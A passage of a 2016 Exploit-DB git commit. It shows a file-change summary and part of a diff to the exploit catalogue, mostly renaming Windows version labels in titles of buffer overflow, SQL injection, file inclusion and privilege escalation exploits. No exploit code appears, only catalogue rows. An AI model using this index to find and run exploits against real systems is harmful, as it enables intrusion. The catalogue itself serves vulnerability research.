From da08dab2c603506e442f42edc138c388e3f8a41e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 10 Mar 2016 05:03:17 +0000 Subject: [PATCH] DB: 2016-03-10 16 new exploits --- files.csv | 73 +- platforms/linux/dos/39537.txt | 605 +++++++++++++++ platforms/linux/dos/39538.txt | 1184 +++++++++++++++++++++++++++++ platforms/linux/dos/39539.txt | 618 +++++++++++++++ platforms/linux/dos/39540.txt | 622 +++++++++++++++ platforms/linux/dos/39541.txt | 641 ++++++++++++++++ platforms/linux/dos/39542.txt | 646 ++++++++++++++++ platforms/linux/dos/39543.txt | 624 +++++++++++++++ platforms/linux/dos/39544.txt | 614 +++++++++++++++ platforms/linux/dos/39545.txt | 23 + platforms/linux/local/33336.c | 164 ++++ platforms/linux/local/39535.sh | 23 + platforms/multiple/dos/39529.txt | 71 ++ platforms/php/webapps/39534.html | 42 + platforms/php/webapps/39536.txt | 148 ++++ platforms/windows/dos/39530.txt | 125 +++ platforms/windows/dos/39533.txt | 51 ++ platforms/windows/local/11199.txt | 7 +- platforms/windows/local/271.c | 6 +- platforms/windows/local/35850.bat | 17 +- platforms/windows/local/5951.c | 166 ++-- platforms/windows/remote/3072.py | 194 ++--- platforms/windows/remote/3531.py | 242 +++--- 23 files changed, 6564 insertions(+), 342 deletions(-) create mode 100755 platforms/linux/dos/39537.txt create mode 100755 platforms/linux/dos/39538.txt create mode 100755 platforms/linux/dos/39539.txt create mode 100755 platforms/linux/dos/39540.txt create mode 100755 platforms/linux/dos/39541.txt create mode 100755 platforms/linux/dos/39542.txt create mode 100755 platforms/linux/dos/39543.txt create mode 100755 platforms/linux/dos/39544.txt create mode 100755 platforms/linux/dos/39545.txt create mode 100755 platforms/linux/local/33336.c create mode 100755 platforms/linux/local/39535.sh create mode 100755 platforms/multiple/dos/39529.txt create mode 100755 platforms/php/webapps/39534.html create mode 100755 platforms/php/webapps/39536.txt create mode 100755 platforms/windows/dos/39530.txt create mode 100755 platforms/windows/dos/39533.txt diff --git a/files.csv b/files.csv index d5f4c3bac..007a7238b 100755 --- a/files.csv +++ b/files.csv @@ -150,7 +150,7 @@ id,file,description,date,author,platform,type,port 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - _mremap()_ Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 -156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080 +156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 @@ -256,7 +256,7 @@ id,file,description,date,author,platform,type,port 268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80 269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) - Remote Root Exploit (Linux x86)",2001-05-08,qitest1,linux,remote,21 270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 -271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 +271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0 273,platforms/linux/local/273.c,"SquirrelMail chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0 274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 - (setsockopt) Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0 @@ -2744,7 +2744,7 @@ id,file,description,date,author,platform,type,port 3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 (udp://) Format String Exploit PoC (ppc)",2007-01-02,MoAB,osx,dos,0 3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 (udp://) Format String Exploit (x86)",2007-01-02,MoAB,osx,local,0 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation Exploit",2007-01-03,erasmus,windows,local,0 -3072,platforms/windows/remote/3072.py,"Apple Quicktime (rtsp URL Handler) Buffer Overflow Exploit (win2k)",2007-01-03,"Winny Thomas",windows,remote,0 +3072,platforms/windows/remote/3072.py,"Apple Quicktime - (rtsp URL Handler) Buffer Overflow Exploit (Windows 2000)",2007-01-03,"Winny Thomas",windows,remote,0 3073,platforms/asp/webapps/3073.txt,"LocazoList <= 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability",2007-01-03,ajann,asp,webapps,0 3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability",2007-01-03,ajann,asp,webapps,0 3075,platforms/php/webapps/3075.pl,"VerliAdmin <= 0.3 (language.php) Local File Inclusion Exploit",2007-01-03,Kw3[R]Ln,php,webapps,0 @@ -3137,7 +3137,7 @@ id,file,description,date,author,platform,type,port 3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Include Vuln",2007-03-13,the_day,php,webapps,0 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 (root_path) Remote File Inclusion Vulnerability",2007-03-13,the_day,php,webapps,0 3473,platforms/php/webapps/3473.txt,"WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability",2007-03-13,the_day,php,webapps,0 -3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4)",2007-03-14,"Winny Thomas",windows,remote,21 +3474,platforms/windows/remote/3474.py,"WarFTP 1.65 - (USER) Remote Buffer Overflow Exploit (Windows 2000 SP4)",2007-03-14,"Winny Thomas",windows,remote,21 3476,platforms/php/webapps/3476.pl,"Zomplog <= 3.7.6 - Local File Inclusion Vulnerabilty (Win32)",2007-03-14,Bl0od3r,php,webapps,0 3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 (comments.php id) Remote SQL Injection Exploit",2007-03-14,WiLdBoY,php,webapps,0 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability",2007-03-14,Dj7xpl,php,webapps,0 @@ -3192,13 +3192,13 @@ id,file,description,date,author,platform,type,port 3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0 3529,platforms/linux/local/3529.php,"PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3530,platforms/php/webapps/3530.pl,"Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit",2007-03-20,fluffy_bunny,php,webapps,0 -3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 - Remote Heap Overflow Exploit (win2k SP4)",2007-03-21,"Winny Thomas",windows,remote,554 +3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 - Remote Heap Overflow Exploit (Windows 2000 SP4)",2007-03-21,"Winny Thomas",windows,remote,554 3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) <= 0.15 - Remote File Inclusion Vulnerability",2007-03-21,K-159,php,webapps,0 3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b (module.php) Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0 3534,platforms/asp/webapps/3534.txt,"Active Link Engine (default.asp catid) Remote SQL Injection Vulnerability",2007-03-21,CyberGhost,asp,webapps,0 3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone (Digest domain) DoS Exploit",2007-03-21,MADYNES,hardware,dos,0 3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery (default.asp catid) SQL Injection Vulnerability",2007-03-21,CyberGhost,asp,webapps,0 -3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)",2007-03-21,"Winny Thomas",windows,remote,143 +3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 - IMAP (SUBSCRIBE) Remote Exploit (Windows 2000 SP4)",2007-03-21,"Winny Thomas",windows,remote,143 3538,platforms/php/webapps/3538.txt,"php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities",2007-03-21,"Cold Zero",php,webapps,0 3539,platforms/php/webapps/3539.txt,"mambo component nfnaddressbook 0.4 - Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (egghunter mod)",2007-03-21,muts,windows,remote,143 @@ -3238,7 +3238,7 @@ id,file,description,date,author,platform,type,port 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Local Root Buffer Overflow Exploit",2007-03-26,harry,bsd,local,0 -3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)",2007-03-26,"Winny Thomas",windows,remote,21 +3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (Windows 2000 SP4)",2007-03-26,"Winny Thomas",windows,remote,21 3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0 3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution Exploit",2007-03-26,Hessam-x,php,webapps,0 3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module Addressbook 1.2 - Local File Inclusion Exploit",2007-03-26,bd0rk,php,webapps,0 @@ -3343,7 +3343,7 @@ id,file,description,date,author,platform,type,port 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability",2007-04-08,the_Edit0r,php,webapps,0 3686,platforms/php/webapps/3686.txt,"WitShare 0.9 (index.php menu) Local File Inclusion Vulnerability",2007-04-08,the_Edit0r,php,webapps,0 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0 -3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0 +3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0 3690,platforms/windows/dos/3690.txt,"Microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection Vulnerability",2007-04-09,"h a c k e r _ X",php,webapps,0 @@ -3648,7 +3648,7 @@ id,file,description,date,author,platform,type,port 3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote BoF Exploit",2007-05-26,rgod,windows,remote,0 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability",2007-05-26,"Mehmet Ince",php,webapps,0 -3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)",2007-05-26,fabio/b0x,windows,remote,80 +3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite - Remote Overflow Exploit (Windows 2003)",2007-05-26,fabio/b0x,windows,remote,80 3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b (securelib) Remote File Inclusion Vulnerabilities",2007-05-27,"ThE TiGeR",php,webapps,0 3998,platforms/php/webapps/3998.php,"Fundanemt <= 2.2.0 (spellcheck.php) Remote Code Execution Exploit",2007-05-27,Kacper,php,webapps,0 3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a (skin) Remote File Disclosure Vulnerability",2007-05-28,GoLd_M,php,webapps,0 @@ -3715,7 +3715,7 @@ id,file,description,date,author,platform,type,port 4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 (low.php topic) Remote SQL Injection Exploit",2007-06-12,Silentz,php,webapps,0 4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion Vulnerability",2007-06-12,Sp[L]o1T,php,webapps,0 4064,platforms/php/webapps/4064.txt,"xoops module horoscope <= 2.0 - Remote File Inclusion Vulnerability",2007-06-12,BeyazKurt,php,webapps,0 -4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)",2007-06-13,rgod,windows,remote,0 +4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control - Remote BoF Exploit (Windows 2000 SP4)",2007-06-13,rgod,windows,remote,0 4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)",2007-06-13,rgod,windows,remote,0 4067,platforms/windows/dos/4067.html,"Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)",2007-06-13,"YAG KOHHA",windows,dos,0 4068,platforms/php/webapps/4068.txt,"XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability",2007-06-13,Sp[L]o1T,php,webapps,0 @@ -5569,7 +5569,7 @@ id,file,description,date,author,platform,type,port 5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0 5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 (drinkid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0 5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 (itemid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0 -5951,platforms/windows/local/5951.c,"XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0 +5951,platforms/windows/local/5951.c,"XnView 1.93.6 for Windows - '.taac' Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling Vulnerability",2008-06-26,"Virangar Security",php,webapps,0 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability",2008-06-26,Ciph3r,php,webapps,0 @@ -7607,7 +7607,7 @@ id,file,description,date,author,platform,type,port 8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 -8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0 +8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0 8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 @@ -9005,7 +9005,7 @@ id,file,description,date,author,platform,type,port 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System (category.php) SQL Injection Vulnerability",2009-08-28,Mr.SQL,php,webapps,0 9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0 9540,platforms/windows/local/9540.py,"HTML Creator & Sender <= 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0 -9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)",2009-08-31,kingcope,windows,remote,21 +9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow Exploit (Windows 2000)",2009-08-31,kingcope,windows,remote,21 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 - (32-bit) ip_append_data() ring0 Root Exploit",2009-08-31,"INetCop Security",linux,local,0 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit",2009-08-31,"Jon Oberheide",linux,local,0 9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability",2009-08-31,Red-D3v1L,php,webapps,0 @@ -9021,7 +9021,7 @@ id,file,description,date,author,platform,type,port 9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability",2009-08-31,HxH,php,webapps,0 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0 -9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21 +9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (Windows 2000 SP4)",2009-09-01,muts,windows,remote,21 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0 @@ -9807,7 +9807,7 @@ id,file,description,date,author,platform,type,port 10560,platforms/php/webapps/10560.txt,"Lizard Cart Multiple SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 10561,platforms/php/webapps/10561.txt,"CFAGCMS SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 10562,platforms/php/webapps/10562.txt,"Ptag <= 4.0.0 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 -10563,platforms/windows/local/10563.py,"PlayMeNow Malformed M3U Playlist WinXP Universal BOF",2009-12-19,loneferret,windows,local,0 +10563,platforms/windows/local/10563.py,"PlayMeNow - Malformed M3U Playlist BOF (Windows XP Universal)",2009-12-19,loneferret,windows,local,0 10564,platforms/php/webapps/10564.txt,"SaurusCMS <= 4.6.4 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0 10567,platforms/php/webapps/10567.txt,"Advance Biz Limited <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-12-20,PaL-D3v1L,php,webapps,0 @@ -9843,7 +9843,7 @@ id,file,description,date,author,platform,type,port 10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 File Disclosure Vulnerability",2009-12-22,Stack,php,webapps,0 10600,platforms/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion Vulnerability",2009-12-22,BAYBORA,php,webapps,0 10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Remote File Upload Vulnerability",2009-12-22,MR.Z,php,webapps,0 -10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 - WinXP SP3",2009-12-22,d3b4g,windows,local,0 +10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3)",2009-12-22,d3b4g,windows,local,0 10603,platforms/windows/dos/10603.c,"TFTP Daemon 1.9 - Denial of Service Exploit",2009-12-22,Socket_0x03,windows,dos,0 10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion Vulnerability",2009-12-22,jgaliana,php,webapps,0 10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection Vulnerability",2009-12-22,Gamoscu,php,webapps,0 @@ -9862,7 +9862,7 @@ id,file,description,date,author,platform,type,port 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman Cross-Site Scripting Vulnerability",2009-12-24,FL0RiX,php,webapps,0 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection SQL injection",2009-12-24,FL0RiX,php,webapps,0 10626,platforms/php/webapps/10626.txt,"Jax Guestbook 3.50 Admin Login Exploit",2009-12-24,Sora,php,webapps,0 -10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 - (.pls) Stack Buffer Overflow Exploit WinXP SP3",2009-12-24,d3b4g,windows,local,0 +10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 - (.pls) Stack Buffer Overflow Exploit (Windows XP SP3)",2009-12-24,d3b4g,windows,local,0 10629,platforms/php/webapps/10629.txt,"Traidnt Gallery add Admin Exploit",2009-12-24,wlhaan-hacker,php,webapps,0 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0 10632,platforms/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection Vulnerability",2009-12-24,molli,php,webapps,0 @@ -9874,7 +9874,7 @@ id,file,description,date,author,platform,type,port 10640,platforms/php/webapps/10640.txt,"Joomla Component com_schools SQL injection",2009-12-24,Mr.tro0oqy,php,webapps,0 10642,platforms/windows/local/10642.rb,"Exploit Easy RM to MP3 2.7.3.700 - Ruby",2009-12-24,"John Babio",windows,local,0 10645,platforms/php/webapps/10645.txt,"PBX Phone System 2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,php,webapps,0 -10646,platforms/windows/local/10646.c,"CastRipper (.M3U) Stack BoF WinXP SP2",2009-12-24,bibi-info,windows,local,0 +10646,platforms/windows/local/10646.c,"CastRipper - (.M3U) Stack BoF (Windows XP SP2)",2009-12-24,bibi-info,windows,local,0 10647,platforms/php/webapps/10647.txt,"VideoIsland Remote shell upload Vulnerability",2009-12-24,RENO,php,webapps,0 10648,platforms/php/webapps/10648.txt,"cms -db <= 0.7.13 - Multiple Vulnerabilities",2009-12-25,"cp77fk4r ",php,webapps,0 10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0 @@ -10093,7 +10093,7 @@ id,file,description,date,author,platform,type,port 10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin - SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0 10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection Vulnerability",2010-01-02,Sora,php,webapps,0 10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0 -10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist BoF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0 +10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist BoF (Windows XP SP2 French)",2010-01-03,bibi-info,windows,local,0 10938,platforms/php/webapps/10938.txt,"Service d'upload 1.0.0 - Shell Upload Vulnerability",2010-01-03,indoushka,php,webapps,0 10940,platforms/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure Vulnerability",2010-01-03,LionTurk,asp,webapps,0 10941,platforms/php/webapps/10941.php,"Joomla Component com_aprice Blind SQL Injection Exploit",2010-01-03,FL0RiX,php,webapps,0 @@ -10279,7 +10279,7 @@ id,file,description,date,author,platform,type,port 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0 11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0 -11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0 +11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0 11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0 11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0day)",2010-01-20,Dz_attacker,windows,remote,0 @@ -10322,7 +10322,7 @@ id,file,description,date,author,platform,type,port 11249,platforms/php/webapps/11249.txt,"boastMachine 3.1 - Remote File Upload Vulnerability",2010-01-24,alnjm33,php,webapps,0 11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service Exploit",2010-01-24,"Zer0 Thunder",windows,dos,0 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0 -11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De",2010-01-25,NeoCortex,windows,local,0 +11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0 11257,platforms/windows/remote/11257.rb,"AOL 9.5 Phobos.Playlist 'Import()' Buffer Overflow Exploit (Meta)",2010-01-25,Trancer,windows,remote,0 11258,platforms/php/webapps/11258.html,"Status2k Remote Add Admin Exploit",2010-01-25,alnjm33,php,webapps,0 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash PoC",2010-01-26,b0telh0,windows,dos,0 @@ -10434,7 +10434,7 @@ id,file,description,date,author,platform,type,port 11380,platforms/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps,0 11382,platforms/php/webapps/11382.txt,"eSmile Script (index.php) SQL Injection Vulnerability",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0 11383,platforms/php/webapps/11383.txt,"HASHE! Solutions Multiple SQL Injection Vulnerabilities",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0 -11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 - PLS PLA Exploit (WinXP SP3)",2010-02-10,"Beenu Arora",windows,local,0 +11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 - PLS PLA Exploit (Windows XP SP3)",2010-02-10,"Beenu Arora",windows,local,0 11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) XSS Vulnerability",2010-02-10,"Sioma Labs",php,webapps,0 11391,platforms/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0 11392,platforms/windows/dos/11392.c,"Radasm 2.2.1.6 - (.rap) Local Buffer Overflow 